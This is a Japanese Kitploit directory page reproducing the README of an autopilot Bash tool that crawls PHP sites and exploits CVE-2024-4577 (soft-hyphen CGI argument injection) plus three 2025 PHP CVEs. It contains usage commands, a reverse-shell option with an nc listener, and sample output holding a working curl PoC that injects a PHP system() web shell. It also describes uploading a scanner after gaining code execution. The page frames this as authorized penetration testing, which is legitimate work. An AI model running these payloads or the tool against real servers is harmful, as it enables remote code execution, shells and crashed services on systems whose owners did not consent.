Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
PHP_8.1.x_Exploit — 重大なPHP脆弱性(CVE-2024-4577 バイパス、CVE-2025-14177、CVE-2025-14180、CVE-2025-14178)の自動検出・悪用 | Kitploit
ツール/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
偵察脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストコマンド&コントロールクローラーリモートアクセスツール
GitHubgl1tch0x1/php_8.1.x_exploit
1145ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

PHP_8.1.x_Exploit

重大なPHP脆弱性(CVE-2024-4577 バイパス、CVE-2025-14177、CVE-2025-14180、CVE-2025-14178)の自動検出・悪用

リポジトリを見る

🚀 PHP CVE オートパイロット

影響を受けるPHPの重大な脆弱性(CVE-2024-4577 バイパス、CVE-2025-14177、CVE-2025-14180、CVE-2025-14178)の自動検出および自動悪用

License: GPL v3 Bash

PHP8.1.x_Exploit.sh は、シングルファイル・ゼロ設定のセキュリティ評価ツールで、脆弱なPHPエンドポイントを自動的に発見し、2024年12月にリリースされたPHP 8.1.34 より前のバージョンに影響する4件の影響度の高いCVEを自動的に悪用します。手動によるペイロード作成は不要で、URLを指定するだけでクローリングからリモートコード実行までスクリプトがすべて行います。完全オートパイロット – ユーザーの操作なしで検出と悪用を自動的に実行します。

機能

  • 完全自律オートパイロット – URLを1つ指定するだけで、ユーザーの操作なしにクロール、フィンガープリント、テスト、悪用を実行します。
  • バッチスキャン – ターゲットのリストを読み込んで並列実行できます。
  • 高度なクローリング – ホームページからリンクとフォームを抽出し、検出精度を高めます。
  • OS・PHPバージョンのフィンガープリント – Linuxに対してWindows専用の攻撃を回避し、PHPバージョンを確認します。
  • CVE-2024-4577 バイパス(Windows CGI 引数インジェクション)
    • 脆弱なPHP-CGIエンドポイントを検出して悪用します。
    • オプションのリバースシェル(PowerShellワンライナー)。
    • 2種類のインジェクション方式: 標準の-dとソフトハイフン%ADによるバイパス。
  • CVE-2025-14177 – getimagesize() によるヒープメモリリーク
    • 不正なJPEGを動的に生成し、発見したアップロードエンドポイントに自動的に送信します。
    • レスポンス内のメモリリークを検出します。
  • RCE経由のディープローカルスキャン(CVE-2024-4577 が悪用された場合)
    • 以下をテストする軽量なPHPスキャナをアップロードします:
      • CVE-2025-14180 – PDO PostgreSQL におけるNULLポインタ参照。
      • CVE-2025-14178 – array_merge における整数オーバーフロー。
  • スマートクローリング – リンクとフォームを抽出し、CGIスクリプトやアップロードページを発見します。
  • 並列実行 – parallel が利用可能な場合は使用し、ない場合は適切にフォールバックします。
  • Verbose・デバッグモード – すべてのHTTPリクエストと判断を確認できます。
  • レポート生成 – すべての検出結果をテキストファイルに保存します。
  • クリーンで安全 – 終了時に一時ファイルを削除し、タイムアウトによるハングアップを防止します。

必要条件

依存関係目的通常インストール済みか?
bash 4.0+スクリプトインタプリタはい(Linux/macOS)
curlHTTPリクエストはい
grep、sed、awkテキスト処理はい
mktemp一時ファイルの作成はい
(オプション)parallelバッチスキャンの高速化いいえ(ただし推奨)
(オプション)jqJSON出力のフォーマットいいえ

root権限は不要 – このツールはHTTPリクエストを送信するのみで、オプションでリバースシェルを実行します(お使いのマシンでリスナーが必要です)。

インストール

git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
cd PHP_8.1.x_Exploit
chmod +x PHP8.1.x_Exploit.sh

使用方法

単一ターゲット(最も一般的)

./PHP8.1.x_Exploit.sh -u http://target.example.com

リバースシェル付き単一ターゲット(CVE-2024-4577)

./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444

その後、お使いのマシンで:

nc -lvnp 4444

複数ターゲットのバッチスキャン

./PHP8.1.x_Exploit.sh -l targets.txt --threads 10

例 targets.txt:

http://192.168.1.1/
https://10.0.0.5:8080/
http://internal-app.company.com

スキャン専用モード(悪用を試行しない)

./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only

レポートをファイルに保存

./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt

Verbose / デバッグ出力

./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # very noisy

動作の仕組み(フェーズ)

フェーズ動作
1フィンガープリント – ヘッダーとプローブからOSとPHPバージョンを特定します。
2クローリング – ホームページからhref 属性とaction 属性を抽出します。
3CGIの発見 – 一般的なパスと、CGIらしいクロール済みリンクを試行します。
4CVE-2024-4577 のテスト – -d と%AD の両方のペイロードを注入し、成功した場合はコマンドを実行するかリバースシェルを送信します。
5アップロードエンドポイントの発見 – 一般的なアップロードパスと、"upload"/"image"を含むフォームを確認します。
6CVE-2025-14177 のテスト – 不正なJPEGを作成し、各アップロードエンドポイントにPOSTしてヒープリークを検出します。
7ディープ内部スキャン – RCEが達成された場合、スキャナ用PHPスクリプトをアップロードして実行し、CVE-2025-14180 / CVE-2025-14178 をテストします。
8レポート – サマリーを表示し、オプションでファイルに書き出します。

コマンドラインオプション(完全リファレンス)

オプション説明
-u URL単一ターゲットのURL(例: http://example.com/)
-l FILE1行に1つのURLを記述したバッチファイル
--scan-only検出のみ – 悪用しない(リバースシェルなし、ペイロードのアップロードなし)
-o FILE最終レポートをFILEに書き出す
--threads Nバッチスキャンの並列スレッド数(デフォルト: 5)
--timeout NHTTPタイムアウト(秒)(デフォルト: 10)
--no-color色付き出力を無効化
--verbose詳細な進行状況を表示
--debugすべてのHTTPリクエストを表示(機密データが露出する可能性があります)
--revshell IP PORTCVE-2024-4577 が検出された場合にリバースシェルを試行
-h, --helpヘルプを表示して終了

対象CVEの詳細

CVE深刻度影響悪用ベクトル修正バージョン
CVE-2024-4577(バイパス)緊急RCEWindows CGI 引数インジェクション(ソフトハイフンマッピング)PHP 8.1.34
CVE-2025-14177中/高情報漏えい(ヒープメモリ)getimagesize() に渡される不正なJPEGPHP 8.1.34
CVE-2025-14180高DoS(NULLポインタ参照)エミュレートされたプリペアドステートメントを使用するPDO PostgreSQL + 不正なパラメータ\x99PHP 8.1.34
CVE-2025-14178高(8.2)DoS / メモリ破損の可能性巨大な配列により整数オーバーフローを引き起こすarray_merge()PHP 8.1.34

注: CVE-2025-14180 と CVE-2025-14178 は、サーバー内部からのみ(ローカルテスト)正確に検出できます。このスクリプトは、CGIエクスプロイトが成功した後にスキャナをアップロードすることでこれを実現します。

📸 出力例

[*] Scanning: http://192.168.1.100/
[*] OS: windows
[*] PHP version: 8.1.33
[*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
[✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
[*] Attempting reverse shell to 192.168.1.5 4444
...
[*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
[-] CVE-2025-14177: Potential heap leak detected!
...
[*] Running deep local scan via RCE...
PHP_VERSION=8.1.33
CVE-2025-14180: VULNERABLE
CVE-2025-14178: VULNERABLE
CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)

===================== Report for http://192.168.1.100/ =====================
OS: windows
PHP: 8.1.33
CVE-2024-4577: EXPLOITABLE at http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input
PoC: curl -X POST --data '<?php system($_GET["c"]); ?>' 'http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input&c=whoami'
CVE-2025-14177: VULNERABLE
CVE-2025-14180/14178: VULNERABLE (see deep scan output)
==============================================================

⚠️ 重要な警告と免責事項

  • オートパイロットモード – このツールはプロンプトなしで脆弱性を自動的に悪用します。許可を受けたターゲットにのみ使用してください。
  • 法的に許可された用途のみ – このツールは許可を得たセキュリティ評価、ペネトレーションテスト、教育目的を対象としています。許可なくシステムに対して使用することは、ほとんどの法域で違法です。
  • 保証なし – 本ソフトウェアは、いかなる種類の保証もなく「現状のまま(AS IS)」で提供されます。
  • 損害の可能性 – エクスプロイトによりサービスがクラッシュしたり(CVE-2025-14180)、メモリが破損したり(CVE-2025-14178)する可能性があります。明示的な同意なしに本番システムで実行しないでください。
  • リバースシェル – --revshell オプションは、ターゲットからお使いのマシンへのソケットを開きます。接続を返す権利があることを確認してください。
  • ログ記録 – お使いのリクエストはターゲットのアクセス/エラーログに記録されます。責任を持って使用してください。

🛠️ トラブルシューティング

問題解決方法
curl: command not foundcurl をインストールしてください
GNU parallel not found無視されます – スクリプトはなくても動作します(バッチスキャンが遅くなります)
CGIエンドポイントが見つからないターゲットがCGIを使用していないか、-d フラグをブロックするWAFの背後にある可能性があります
CVE-2024-4577 は動作するがリバースシェルが失敗するファイアウォールを確認してください。--scan-only と手動のnc リスナーでより単純なペイロードを試してください
画像リークテストが常に「No leak」を返すアップロードエンドポイントが getimagesize() を使用していないか、バイナリデータを除去している可能性があります
ローカルスキャナのアップロードが失敗するWebルートが書き込み可能でない可能性があります。スクリプトはCGIスクリプトと同じディレクトリに書き込もうとします

🤝 コントリビューション

プルリクエスト、バグ報告、機能提案を歓迎します。以下の点に従ってください:

  • スクリプトをシングルファイルで純粋なBashのままにしてください。
  • parallel ありとなしの両方でテストしてください。
  • このREADMEを適宜更新してください。

📜 ライセンス

GNU General Public License v3.0 – LICENSE ファイルを参照してください。

📚 リファレンス

  • PHP 8.1.34 リリースのお知らせ
  • CVE-2024-4577 の詳細(NVD)
  • CVE-2025-14177 / 14178 / 14180(NVD)
  • Windows ベストフィット文字マッピング

セキュリティコミュニティのために🧠を込めて作られています。倫理的に使用してください。

ツールをダウンロード